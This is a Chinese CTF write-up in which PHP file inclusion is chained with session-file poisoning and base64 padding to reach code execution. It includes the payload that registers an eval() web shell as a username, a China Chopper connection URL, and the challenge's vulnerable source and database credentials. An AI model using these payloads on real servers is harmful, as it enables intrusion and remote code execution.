index.php
login.php
register.php
config.php
logout.php
wappalyzer显示 php5.5.9 Apache2.4.7 ubuntu系统

文件包含

http://54.222.188.152:22589/index.php?action=login.php

读取源码

http://54.222.188.152:22589/index.php?action=php://filter/read=convert.base64-encode/resource=index.php
index.php
login.php
register.php
config.php
logout.php

base64解码后得到源代码，进行代码审计

发现sql查询处，用了预编译，无法注入
用户可控，且没有防护的参数为session，session与用户名有关

Paste_Image.png

先注册用户名，然后登陆，登陆时username的值会以某种形式保存在SESSION数组中（一般是序列化+base64加密，方便调用），然后服务器会返回一个cookie

这里联想到包含session缓存文件

php的 session文件的默认存放位置大致如下

/var/lib/php/sess_PHPSESSID
/var/lib/php5/sess_PHPSESSID
/tmp/sess_PHPSESSID
/tmp/sessions/sess_PHPSESSID

其中，PHPSESSID是cookie中的PHPSESSID值

成功包含session缓存文件

路径为 /var/lib/php5/sess_PHPSESSID
这里是注册了一个用户名haha，然后登陆的时候得到cookie中的PHPSESSID，然后在index.php包含session的文件内容

Paste_Image.png

Paste_Image.png

接下来要调用php://filter/read=convert.base64-decode/resource=的伪协议，在包含之前将中间那段base64解开，再包含php代码

但是在解码之前的 username|s:8:"这14个字符串会影响对后面base64的解码，所以这里是考察base64编码的知识

base64加密是把3*8=24bit加密成4*6=24bit，即3个字符加密成4个字符
base64解密是把4*6=24bit解密成3*8=24bit，即4个字符解密成3个字符

base64解密时，一个字符6bit，14个字符就是14*6=84bit，84/24除不尽
所以解密时必定会影响后面编码的字符串

如果能把前面14个字符补充到16个字符，则解密时6*16=96bit，96/24=4 可以整除
所以base64解码解码时不会影响后面编码的字符串，只是前面会乱码而已

这里可以注册较长的用户名，使得 username|s:8:"中的数字从1位数变为3位数(这里以100为例)，即可达到16个字符，这里的8是用户名用base64加密后的长度，username进行base64加密后为100个字符，则username长度至少为 100*6bit/8bit=75

至此我们可以用75个a + php代码的形式注册用户名，就能在包含session缓存文件的时候，调用base64-decode的php伪协议，先解码再包含，从而达到php代码执行的效果

先测试<?php echo 'haha';?>

Paste_Image.png

Paste_Image.png

Paste_Image.png

成功执行php命令

接下来注册 75个a+php一句话 的username

注册并登陆后，拿到cookie中的PHPSESSID，然后上菜刀连接

注册并登陆的payload

username=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa<?php @eval($_POST['caidao']); ?>&password=123

菜刀连接的payload，密码是 caidao

http://54.222.188.152:22589/index.php?action=php://filter/read=convert.base64-decode/resource=/var/lib/php5/sess_a0e6k729l1jp80jj45gvieua34

Paste_Image.png

Paste_Image.png

Paste_Image.png

附上几个php文件的源码

index.php

<?php
error_reporting(0);
session_start();
if (isset($_GET['action'])) {
    include $_GET['action'];
    exit();
} else {
?>

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <title>Login</title>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link href="css/bootstrap.css" rel="stylesheet" media="screen">
    <link href="css/main.css" rel="stylesheet" media="screen">
</head>
<body>
<div class="container">
    <div class="form-signin">
        <?php if (isset($_SESSION['username'])) { ?>
            <?php echo "<div class=\"alert alert-success\">You have been <strong>successfully logged in</strong>.</div>
<a href=\"index.php?action=logout.php\" class=\"btn btn-default btn-lg btn-block\">Logout</a>";}else{ ?>
            <?php echo "<div class=\"alert alert-warning\">Please Login.</div>
<a href=\"index.php?action=login.php\" class=\"btn btn-default btn-lg btn-block\">Login</a>
<a href=\"index.php?action=register.php\" class=\"btn btn-default btn-lg btn-block\">Register</a>";
        } ?>
    </div>
</div>
</body>
</html>

<?php

}
?>

login.php

<?php
    require_once('config.php');
    session_start();
    if($_SESSION['username']) {
        header('Location: index.php');
        exit;
    }
    if($_POST['username'] && $_POST['password']) {
        $username = $_POST['username'];
        $password = md5($_POST['password']);

        $mysqli = @new mysqli($dbhost, $dbuser, $dbpass, $dbname);

        if ($mysqli->connect_errno) {
            die("could not connect to the database:\n" . $mysqli->connect_error);
        }
        $sql = "select password from user where username=?";
        $stmt = $mysqli->prepare($sql);
        $stmt->bind_param("s", $username);
        $stmt->bind_result($res_password);
        $stmt->execute();

        $stmt->fetch();
        if ($res_password == $password) {
            $_SESSION['username'] = base64_encode($username);
            header("location:index.php");
        } else {
            die("Invalid user name or password");
        }
        $stmt->close();
        $mysqli->close();
    }
    else {
?>
<!DOCTYPE html>
<html>
<head>
   <title>Login</title>
   <link href="static/bootstrap.min.css" rel="stylesheet">
   <script src="static/jquery.min.js"></script>
   <script src="static/bootstrap.min.js"></script>
</head>
<body>
    <div class="container" style="margin-top:100px">  
        <form action="login.php" method="post" class="well" style="width:220px;margin:0px auto;">
            <h3>Login</h3>
            <label>Username:</label>
            <input type="text" name="username" style="height:30px"class="span3"/>
            <label>Password:</label>
            <input type="password" name="password" style="height:30px" class="span3">

            <button type="submit" class="btn btn-primary">LOGIN</button>
        </form>
    </div>
</body>
</html>
<?php
    }
?>

register.php

<?php

if ($_POST['username'] && $_POST['password']) {
    require_once('config.php');

    $username = $_POST['username'];
    $password = md5($_POST['password']);

    $mysqli = @new mysqli($dbhost, $dbuser, $dbpass, $dbname);
    if ($mysqli->connect_errno) {
        die("could not connect to the database:\n" . $mysqli->connect_error);
    }
    $mysqli->set_charset("utf8");
    $sql = "select * from user where username=?";
    $stmt = $mysqli->prepare($sql);
    $stmt->bind_param("s", $username);
    $stmt->bind_result($res_id, $res_username, $res_password);
    $stmt->execute();
    $stmt->store_result();
    $count = $stmt->num_rows();
    if($count) {
        die('User name Already Exists');
    } else {
        $sql = "insert into user(username, password) values(?,?)";
        $stmt = $mysqli->prepare($sql);
        $stmt->bind_param("ss", $username, $password);
        $stmt->execute();
        echo 'Register OK!<a href="index.php">Please Login</a>';
    }
    $stmt->close();
    $mysqli->close();
} else {

?>
<!DOCTYPE html>
<html>
<head>
   <title>Login</title>
   <link href="static/bootstrap.min.css" rel="stylesheet">
   <script src="static/jquery.min.js"></script>
   <script src="static/bootstrap.min.js"></script>
</head>
<body>
    <div class="container" style="margin-top:100px">  
        <form action="register.php" method="post" class="well" style="width:220px;margin:0px auto;">
            <h3>Register</h3>
            <label>Username:</label>
            <input type="text" name="username" style="height:30px"class="span3"/>
            <label>Password:</label>
            <input type="password" name="password" style="height:30px" class="span3">

            <button type="submit" class="btn btn-primary">REGISTER</button>
        </form>
    </div>
</body>
</html>
<?php
    }
?>

logout.php

<?php
session_start();
session_destroy();
ob_start();
header("location:index.php");
ob_end_flush();

config.php

<?php 
$dbhost = 'localhost';
$dbuser = 'web';
$dbpass = 'webpass123';
$dbname = 'web';
 ?>